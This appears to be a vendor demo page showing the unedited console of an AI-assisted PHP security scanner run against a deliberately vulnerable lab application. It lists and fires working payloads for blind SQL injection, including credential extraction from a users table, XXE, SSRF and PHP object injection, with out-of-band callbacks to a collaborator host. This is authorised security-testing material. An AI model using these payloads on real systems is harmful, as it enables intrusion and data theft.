GGSec Cortex · for the curious

Live CLI run — out-of-band confirmation

The complete, unedited console of one real scan. The AI reads two source files, finds four blind sinks — zero visible response — builds out-of-band payloads, and the built-in collaborator captures the callbacks: a blind PHP object-injection → RCE and a blind SSRF, both proven with hard evidence. (Local host paths masked; callback tokens are per-scan and random.)

50.4stotal run
18requests
2confirmed (OOB)
3likely
517 / 1838AI tokens in / out
ggsec-cortex --dir oob_demo_src --probe http://172.26.203.184 --oob --oob-public-host 172.26.192.1
  ____  ____ ____  _____ ____
 / ___|/ ___/ ___|| ____/ ___|
| |  _| |  _\___ \|  _|| |
| |_| | |_| |___) | |__| |___
 \____|\____|____/|_____\____|

  GGSec Cortex  ·  v0.9 Beta
  AI-Guided DAST · Context-Aware SAST
  GG Advanced IT Security — ggsec.de
[*] Loaded config: empty.config.json
[*] Scan started : 2026-07-08 17:09:49
[*] Target dir   : oob_demo_src

┌─────────────────────────────────────────────────────┐
│  Phase 1 - SAST  (Static Analysis via Claude AI)    │
└─────────────────────────────────────────────────────┘
[*] Multi-file scan: 2 source file(s)  [ext: .ctp .engine .inc .install .module .phar .php .php3 .php4 .php5 .php7 .php8 .phps .pht .phtml .profile .theme .tpl]
    [i] Dependency/VCS dirs skipped (vendor, node_modules, bower_components, .git, .svn, .hg); use --include-vendor to scan them.
    → oob_test.php
    → poi_oob_test.php
[*] Found 2 source file(s) in oob_demo_src
[*] Dependency-aware batching: 1 batch(es), budget ~120000 input tok/batch (chars/4).
[*] Batch 1/1: 2 file(s) — sending to Claude…
    → batch 1: 4 target(s), tokens in=517 out=1838          
[*] Total tokens across 1 batch(es): input=517 output=1838
[*] Regex safety-net: +1 sink(s) the AI SAST did not flag (marked Potential — verify).

====================================================================================================
  GGSEC CORTEX - SCAN PLAN
  File: oob_demo_src
====================================================================================================

SUMMARY:
  Three files expose multiple vulnerability classes: blind SQL injection, blind XXE, blind SSRF (all in oob_test.php), and PHP Object Injection with an OOB gadget (poi_oob_test.php). All blind sinks require OOB or time-based detection since no output is reflected.

GENERAL NOTES:
  - oob_test.php contains three fully blind sinks (SQLi, XXE, SSRF) with no in-band signal — OOB or time-based detection required.
  - poi_oob_test.php deserializes a cookie value without validation; the Fetcher gadget class performs an outbound HTTP request in __destruct(), making OOB the only viable detection vector.
  - All sinks accept direct user input with zero sanitization.

TARGETS FOUND: 5

----------------------------------------------------------------------------------------------------
  [1] [HIGH] (Probable)  id
      Location    : oob_test.php
      Sink type   : SQL_QUERY
      Impact      : AUTH_BYPASS
      CWE         : CWE-89 (SQL Injection)
                    SQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
      CVSS v3.1   : 8.9 (High)   [Base 9.8 Critical]  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RC:R
      SAST signal : Confidence=Taint-flow · Exploitability=Direct · Access=Unauthenticated
      Compliance  : A03:2021 – Injection  ·  PCI-DSS v4.0 Req 6.2.4 (injection/XSS)
                    ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
      MITRE ATT&CK: T1190 Exploit Public-Facing Application
      Attack chain: Attacker supplies a crafted 'id' parameter → value is concatenated into SQL → blind execution via mysqli_query(). Time-based payloads confirm the injection.
      Flow        : $_GET['id'] is interpolated directly into a SQL query string "SELECT * FROM users WHERE id = $id" and executed via mysqli_query(). The result is never echoed, making this a fully blind SQLi. Time-based detection (SLEEP) is the appropriate method.

      TEST CASES:

      > Category   : SQLi
        Method     : GET
        Endpoint   : /oob_test.php
        Indicator  : response_delay
        Payloads   :
          -> 1 AND SLEEP(5)-- -
          -> 1 OR SLEEP(5)-- -
          -> 1) AND SLEEP(5)-- -
          -> 1 AND BENCHMARK(10000000,SHA1('a'))-- -
          -> 1 UNION SELECT SLEEP(5)-- -

      > Category   : SQLi
        Method     : GET
        Endpoint   : /oob_test.php
        Indicator  : Warning: mysqli|SQL syntax|SQLSTATE
        Payloads   :
          -> 1'
          -> 1 OR 1=1-- -
          -> 1 UNION SELECT 1,2,3,4-- -
          -> 0 UNION SELECT username,password,3,4 FROM users-- -

----------------------------------------------------------------------------------------------------
  [2] [MEDIUM] (Probable)  xml
      Location    : oob_test.php
      Sink type   : XXE
      Impact      : FILE_READ
      CWE         : CWE-611 (XML External Entity Reference)
                    An XML parser resolves external entities, enabling local-file disclosure, SSRF, or denial of service.
      CVSS v3.1   : 6.8 (Medium)   [Base 7.5 High]  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RC:R
      SAST signal : Confidence=Taint-flow · Exploitability=Direct · Access=Unauthenticated
      Compliance  : A05:2021 – Security Misconfiguration  ·  PCI-DSS v4.0 Req 2.2.1 / 6.2.4
                    ISO/IEC 27001:2022 A.8.9 / A.8.28  ·  GDPR Art. 32 (security of processing)
      MITRE ATT&CK: T1083 File and Directory Discovery · T1005 Data from Local System
      Attack chain: Attacker POSTs a malicious XML document with an external parameter entity → simplexml_load_string() parses it → DTD processing triggers an outbound HTTP request to the OOB collaborator.
      Flow        : $_POST['xml'] is passed directly to simplexml_load_string() with default flags. The parsed result is never echoed — fully blind XXE. An external parameter entity referencing an OOB callback is the only viable detection method. The fetch occurs during DTD parsing, no body reference needed.

      TEST CASES:

      > Category   : XXE
        Method     : POST
        Endpoint   : /oob_test.php
        Indicator  : oob_callback
        Payloads   :
          -> <?xml version="1.0"?><!DOCTYPE r [<!ENTITY % x SYSTEM "{OOB_HTTP}"> %x;]><r/>
          -> <?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "{OOB_HTTP}">]><r>&x;</r>

----------------------------------------------------------------------------------------------------
  [3] [HIGH] (Probable)  url
      Location    : oob_test.php
      Sink type   : SSRF
      Impact      : INFORMATION_DISCLOSURE
      CWE         : CWE-918 (Server-Side Request Forgery)
                    The server fetches a user-supplied URL, letting an attacker reach internal services or cloud metadata.
      CVSS v3.1   : 7.8 (High)   [Base 8.6 High]  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N/E:P/RC:R
      SAST signal : Confidence=Taint-flow · Exploitability=Direct · Access=Unauthenticated
      Compliance  : A10:2021 – Server-Side Request Forgery (SSRF)  ·  PCI-DSS v4.0 Req 6.2.4
                    ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
      MITRE ATT&CK: T1090 Proxy · T1552.005 Unsecured Credentials: Cloud Instance Metadata API
      Attack chain: Attacker supplies a URL in the 'url' parameter → file_get_contents() fetches it server-side → the server makes an outbound request to the attacker-controlled OOB collaborator.
      Flow        : $_GET['url'] is passed directly to file_get_contents() with no validation. The fetched data is stored in $data but never echoed — fully blind SSRF. OOB callback is the only detection method.

      TEST CASES:

      > Category   : SSRF
        Method     : GET
        Endpoint   : /oob_test.php
        Indicator  : oob_callback
        Payloads   :
          -> {OOB_HTTP}
          -> http://{OOB_DNS}/ssrf-test

----------------------------------------------------------------------------------------------------
  [4] [HIGH] (Probable)  prefs
      Location    : poi_oob_test.php
      Sink type   : PHP_OBJECT_INJECTION
      Impact      : RCE
      CWE         : CWE-502 (Deserialization of Untrusted Data)
                    Untrusted serialized data is deserialized, invoking gadget chains that can lead to remote code execution.
      CVSS v3.1   : 8.9 (High)   [Base 9.8 Critical]  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RC:R
      SAST signal : Confidence=Taint-flow · Exploitability=Direct · Access=Unauthenticated
      Compliance  : A08:2021 – Software and Data Integrity Failures  ·  PCI-DSS v4.0 Req 6.2.4 / 6.4.3
                    ISO/IEC 27001:2022 A.8.28 / A.8.29  ·  GDPR Art. 32 (security of processing)
      MITRE ATT&CK: T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter
      Attack chain: Attacker sets Cookie: prefs=<serialized Fetcher with url={OOB_HTTP}> → unserialize() instantiates Fetcher → script ends → GC triggers __destruct() → file_get_contents({OOB_HTTP}) fires outbound request to attacker-controlled server.
      Flow        : $_COOKIE['prefs'] is passed directly to unserialize(). The Fetcher gadget class is in scope: its __destruct() calls file_get_contents($this->url) on an attacker-controlled URL property. The return value of file_get_contents is discarded (@-suppressed, not echoed), so there is zero in-band signal. Detection requires an OOB collaborator callback. The serialized Fetcher payload sets $url to the OOB callback URL; when the unserialized object is garbage-collected, __destruct fires the outbound request.

      TEST CASES:

      > Category   : PHP Object Injection
        Method     : GET
        Endpoint   : /poi_oob_test.php
        Indicator  : oob_callback
        Payloads   :
          -> O:7:"Fetcher":1:{s:3:"url";s:7:"{OOB_HTTP}";}
          -> O:7:"Fetcher":1:{s:3:"url";s:7:"{OOB_DNS}";}

----------------------------------------------------------------------------------------------------
  [5] [MEDIUM] (Potential)  url
      Location    : oob_test.php:21
      Sink type   : PATH_TRAVERSAL
      Impact      : FILE_READ
      CWE         : CWE-22 (Path Traversal / Arbitrary File Read)
                    User-controlled path components escape the intended directory, exposing arbitrary files (/etc/passwd, config, source).
      CVSS v3.1   : 6.3 (Medium)   [Base 7.5 High]  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RC:U
      SAST signal : Confidence=Potential · Exploitability=Low · Access=Unauthenticated
      Compliance  : A01:2021 – Broken Access Control  ·  PCI-DSS v4.0 Req 6.2.4 / 7.2.1
                    ISO/IEC 27001:2022 A.8.3 / A.5.15  ·  GDPR Art. 5(1)(f) + Art. 32 (confidentiality)
      MITRE ATT&CK: T1083 File and Directory Discovery · T1005 Data from Local System
      Flow        : [Regex safety-net — the AI SAST did NOT flag this sink; added as a backstop against false-negatives. Low confidence, verify manually.] Regex-SAST (no LLM): tainted ${_REQUEST}['url'] reaches a PATH_TRAVERSAL sink at oob_test.php:21 without an escape/parameterisation guard on the line. Heuristic — verify.

      TEST CASES:

      > Category   : PATH_TRAVERSAL
        Method     : GET
        Endpoint   : /oob_test.php?url=PAYLOAD
        Indicator  : root:|daemon:
        Payloads   :

====================================================================================================
  FINDINGS  (Certainty × Severity — Effective CVSS):
                       Critical   High  Medium   Low
    Confirmed (DAST)          0      0       0     0
    Probable (SAST)           0      3       1     0
    Potential                 0      0       1     0
    (Effective = certainty/access-adjusted; per-finding shows Base worst-case. 15 test payload(s).)

  SECURITY RATING:
    Rating: C | Severity: HIGH (3 High) | Compromise Probability: Moderate (~40-60%)
    Max CVSS: 8.9 (High) | Critical: 0  High: 3  Medium: 2  Low: 0

  IMPACT SUMMARY:
    RCE: 1
    FILE_READ: 2
    AUTH_BYPASS: 1
    INFORMATION_DISCLOSURE: 1
====================================================================================================

[IR warn] SAST plan: target[4] (PATH_TRAVERSAL/url).tc[0]: no Payloads — PayloadEngine will fill from YAML if a pack exists for PATH_TRAVERSAL.
[IR ok] SAST plan: schema 1.0, 5 target(s), 1 warning(s)
[+] Saved to: oob_demo_src.scanplan.txt
[*] SAST completed in 32,9s  (plan cached: oob_demo_src.scanplan.json)

[*] Preset: full  (crawl=on, dom=on, oob=on)
┌──────────────────────────────────────────────────────┐
│  Phase 2 - DAST  (Dynamic Probing via HttpProbe)     │
│  Target : http://172.26.203.184                      │
│  Concurrency: 4   Retries: 2   XSS delay: 800ms      │
└──────────────────────────────────────────────────────┘
[*] PayloadEngine: loaded 13 pack(s) from …\bin\Debug\net8.0\payloads (9 sink type(s))
[*] PayloadEngine: CSRF(4 payloads), JSONP(6 payloads), OPEN_REDIRECT(14 payloads), (0 payloads), CODE_EXEC(50 payloads), SQL_QUERY(44 payloads), SSRF(25 payloads), TYPE_JUGGLE(15 payloads), XSS(39 payloads)
[OOB] Collaborator up — HTTP:8888 DNS:15353 zone=*.oob.local.test publicHost=172.26.192.1
[*] GGSec Cortex DAST engine v0.9: 16 requests across 5 targets
[*] v11.1 Form Crawl: discovering endpoints...
[*] Security Headers Audit:
 [MISS] CSP: MISSING
 [MISS] X-Frame-Options: MISSING
 [MISS] X-Content-Type-Options: MISSING
 [MISS] HSTS: MISSING
 [MISS] Referrer-Policy: MISSING
 [MISS] Permissions-Policy: MISSING
 [INFO] Server header exposes: Apache/2.4.58
[*] Form Crawl: no additional endpoints found
[*] Auto-discovering 0 endpoint variations...
[*] Phase 1: auth/session harvesting
[+] Admin session ready (1 cookie(s))
[+] Admin session refreshed
[*] Phase 2: remaining targets
[VULN-LIKELY] GET oob_test.php?id=1%27
[VULN-LIKELY] GET oob_test.php?id=1%20UNION%20SELECT%201%2C2%2C3%2C4--%20-
  Payload: 1'
  Detection: http-500-likely-sql-error
[VULN-LIKELY] GET oob_test.php?id=1%20OR%201%3D1--%20-
  Payload: 1 UNION SELECT 1,2,3,4-- -
  Detection: http-500-likely-sql-error
  Payload: 1 OR 1=1-- -
  Detection: http-500-likely-sql-error
[VULN-LIKELY] GET oob_test.php?id=admin%27%20OR%20SLEEP%285%29--
  Payload: admin' OR SLEEP(5)--
  Detection: http-500-likely-sql-error (time-payload)
[VULN-LIKELY] GET oob_test.php?id=0%20UNION%20SELECT%20username%2Cpassword%2C3%2C4%20FROM%20users--%20-
  Payload: 0 UNION SELECT username,password,3,4 FROM users-- -
  Detection: http-500-likely-sql-error
[VULN] GET http://172.26.203.184/oob_test.php?url=http%3A%2F%2F172.26.192.1%3A8888%2F519205e607c1
  Payload: http://172.26.192.1:8888/519205e607c1
  Detection: oob-callback-http
[ok  ] GET http://172.26.203.184/oob_test.php?url=http%3A%2F%2Fd05febbb035b.oob.local.test%2Fssrf-test :: 200, 8244ms
[ok  ] POST http://172.26.203.184/oob_test.php :: 200, 8210ms
[ok  ] POST http://172.26.203.184/oob_test.php :: 200, 8214ms
[*] 5 serialized payload(s) for oob_test.php (time-based / 2nd-order) — running one at a time
[VULN-LIKELY] GET oob_test.php?id=1%20AND%20SLEEP%285%29--%20-
  Payload: 1 AND SLEEP(5)-- -
  Detection: http-500-likely-sql-error (time-payload)
[VULN-LIKELY] GET oob_test.php?id=1%20OR%20SLEEP%285%29--%20-
  Payload: 1 OR SLEEP(5)-- -
  Detection: http-500-likely-sql-error (time-payload)
[VULN-LIKELY] GET oob_test.php?id=1%29%20AND%20SLEEP%285%29--%20-
  Payload: 1) AND SLEEP(5)-- -
  Detection: http-500-likely-sql-error (time-payload)
[VULN-LIKELY] GET oob_test.php?id=1%20AND%20BENCHMARK%2810000000%2CSHA1%28%27a%27%29%29--%20-
  Payload: 1 AND BENCHMARK(10000000,SHA1('a'))-- -
  Detection: http-500-likely-sql-error (time-payload)
[VULN-LIKELY] GET oob_test.php?id=1%20UNION%20SELECT%20SLEEP%285%29--%20-
  Payload: 1 UNION SELECT SLEEP(5)-- -
  Detection: http-500-likely-sql-error (time-payload)
[VULN] GET (cookie) http://172.26.203.184/poi_oob_test.php
  Payload: O:7:"Fetcher":1:{s:3:"url";s:37:"http://172.26.192.1:8888/6d57d558a5b4";}
  Detection: oob-callback-http
[ok  ] GET (cookie) http://172.26.203.184/poi_oob_test.php :: 200, 8240ms
[*] Active header checks: CORS · Host-header · Cache-Control
  [ok ] CORS: no arbitrary-origin reflection
  [ok ] Host-header: attacker host not reflected
  [ok ] Cache-Control: no cacheable session response observed
  [warn] Version-indicated CVE (unverified): apache 2.4.58 → CVE-2024-38475 (Critical)
  [warn] Version-indicated CVE (unverified): apache 2.4.58 → CVE-2024-38476 (High)
[*] PII / data-exposure scan: none found
[*] Deep crawl (--crawl): spidering for param-bearing endpoints...
[*] Deep crawl: 6 param-bearing URL(s) discovered → fuzzing

[*] Scan complete: 18 requests, 5 finding(s) [2 confirmed, 3 likely] from 14 confirming request(s)
  [CONFIRMED] PHP_OBJECT_INJECTION prefs          CVSS 9.8  CWE-502  (confirmed by 1 payload(s))
      Certainty: Confirmed (dynamic probe) · Evidence strength: Medium (83/100)
      GET (cookie) http://172.26.203.184/poi_oob_test.php
      Access: 🔓 Unauthenticated
      e.g. payload: O:7:"Fetcher":1:{s:3:"url";s:37:"http://172.26.192.1:8888/6d57d558a5b4";}
      PoC: OOB HTTP callback received by the GGSec collaborator — the target issued an outbound request to http://172.26.192.1:8888/6d57d558a5b4, provi…
      ATT&CK: T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter
      Fix: Do not unserialize untrusted data; use a safe format and restrict allowed classes.
  [LIKELY]    OUTDATED_COMPONENT apache 2.4.58 · CVE-2024-38475 CVSS 8.9  [Base 9.8] CWE-1104 (confirmed by 1 payload(s))
      Certainty: Likely (dynamic probe) · Evidence strength: Low (43/100)
      GET 
      Access: 🔓 Unauthenticated
      e.g. payload: outdated-component
      PoC: Server banner 'Apache/2.4.58' matches CVE-2024-38475 (CWE-22, Critical): mod_rewrite improper output escaping → URL mapped to filesystem (RC…
      ATT&CK: T1190 Exploit Public-Facing Application
      Fix: Upgrade the flagged component to a fixed release; version-indicated — verify against your actual (possibly backported) build.
  [LIKELY]    SQL_QUERY          id             CVSS 8.9  [Base 9.8] CWE-89   (confirmed by 10 payload(s))
      Certainty: Likely (dynamic probe) · Evidence strength: Tentative (30/100)
      GET oob_test.php?id=1%20UNION%20SELECT%201%2C2%2C3%2C4--%20-
      Access: 🔓 Unauthenticated
      e.g. payload: 1 UNION SELECT 1,2,3,4-- -
      PoC: (no response body captured)
      ATT&CK: T1190 Exploit Public-Facing Application
      Fix: Use parameterized queries / prepared statements — never build queries by string concatenation.
  [CONFIRMED] SSRF               url            CVSS 7.7  [Base 8.6] CWE-918  (confirmed by 1 payload(s))
      Certainty: Confirmed (dynamic probe) · Evidence strength: Medium (83/100)
      GET http://172.26.203.184/oob_test.php?url=http%3A%2F%2F172.26.192.1%3A8888%2F519205e607c1
      Access: 👤 Customer
      e.g. payload: http://172.26.192.1:8888/519205e607c1
      PoC: OOB HTTP callback received by the GGSec collaborator — the target issued an outbound request to http://172.26.192.1:8888/519205e607c1, provi…
      ATT&CK: T1090 Proxy · T1552.005 Unsecured Credentials: Cloud Instance Metadata API
      Fix: Allowlist outbound destinations and block internal address ranges; don't fetch user URLs directly.
  [LIKELY]    OUTDATED_COMPONENT apache 2.4.58 · CVE-2024-38476 CVSS 6.8  [Base 7.5] CWE-1104 (confirmed by 1 payload(s))
      Certainty: Likely (dynamic probe) · Evidence strength: Low (43/100)
      GET 
      Access: 🔓 Unauthenticated
      e.g. payload: outdated-component
      PoC: Server banner 'Apache/2.4.58' matches CVE-2024-38476 (CWE-476, High): mod_proxy null-pointer dereference → DoS via malicious backend respons…
      ATT&CK: T1190 Exploit Public-Facing Application
      Fix: Upgrade the flagged component to a fixed release; version-indicated — verify against your actual (possibly backported) build.
[*] DAST completed in 16,8s
[*] Raw HTTP log: oob_demo_src.20260708-170949.rawlog.txt

[*] Dependency scan (oob_demo_src): no known-vulnerable versions matched
[+] HTML report saved — open: cortex-oob-demo.report.html
[+] PDF report saved — open: cortex-oob-demo.report.pdf
╔══════════════════════════════════════════════════════╗
║              SCAN TIMING SUMMARY                     ║
║──────────────────────────────────────────────────────║
║  Started  : 2026-07-08 17:09:49                      ║
║  Finished : 2026-07-08 17:10:39                      ║
║  Duration : 50,4s                                    ║
╚══════════════════════════════════════════════════════╝

Real, unedited output against a deliberately-vulnerable test application (PHP 8.3 / Apache 2.4). For authorised security testing only. · Open the full report → · GG Advanced IT Security — ggsec.de